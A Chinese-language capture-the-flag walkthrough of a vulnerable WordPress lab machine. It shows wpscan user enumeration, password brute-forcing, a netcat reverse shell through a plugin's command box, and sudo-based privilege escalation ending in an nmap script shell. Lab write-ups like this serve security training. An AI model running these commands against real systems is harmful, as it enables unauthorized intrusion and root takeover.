一:信息收集阶段
1.首先确定目标机与kalI在同一网段
2.确定对方ip
搜寻目标端口及服务的详细信息,发现开有80,22 以及目标的cms为wordpress
首先访问一下80web看看,发现强制跳转到了wordy,所以需要在主机hosts文件里修改hosts文件和在kali里修改
访问成功后,确实为wordpress,这里他们提示他们的插件是最安全的,那么这个网页的插件可能有漏洞
即为wordpress那么根据对wordpress的了解我们直接在url后面访问一下wp-admin 发现进入了后台登录页面
那我们就在kali中使用wpscan对网站进行专项扫描,枚举出了五个用户
wpscan --url http://wordy -e u #枚举用户
官方又给我们有提示告诉了我们密码的字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
那我们把上面的用户建立一个文本,使用wpscan开始爆破,得到mark的密码,那就进后台登录一下
登进去后根据提示主要是看哪里有插件看看是否存在漏洞,随便点点发现里面有个插件可以执行命令
这个输入框有字数限制,通过bp抓包也行,或者f12打开开发者工具进行修改长度,最后都是执行nc反弹,并在kali监听
nc 192.168.150.128 8899 -e /bin/bash
成功拿到shell权限为www-data,下一步就是进行提权
二、提权阶段
1.首先写个伪终端
python -c "import pty;pty.spawn('/bin/bash')"
2.查看suid权限
find / -perm -u=s -type f 2>/dev/null
3.查看sudo权限
sudo -l
4.发现都不行,进入home家目录全部查看在/home/mark/stuff/things-to-do.txt发现了graham的密码
5.ssh登录graham
ssh graham@192.168.226.130
6.查看suid权限
find / -perm -u=s -type f 2>/dev/null
7.查看sudo权限
sudo -l
8.查看到jens的执行脚本,查看内容
cat /home/jens/backups.sh
9.查看权限
ls -l /home/jens/backups.sh
10.有修改权限,开始修改并执行
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
11.查看suid权限
find / -perm -u=s -type f 2>/dev/null
12.查看sudo权限
sudo -l
13.发现可以利用的命令nmap,查询使用方法
14.根据命令提权
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF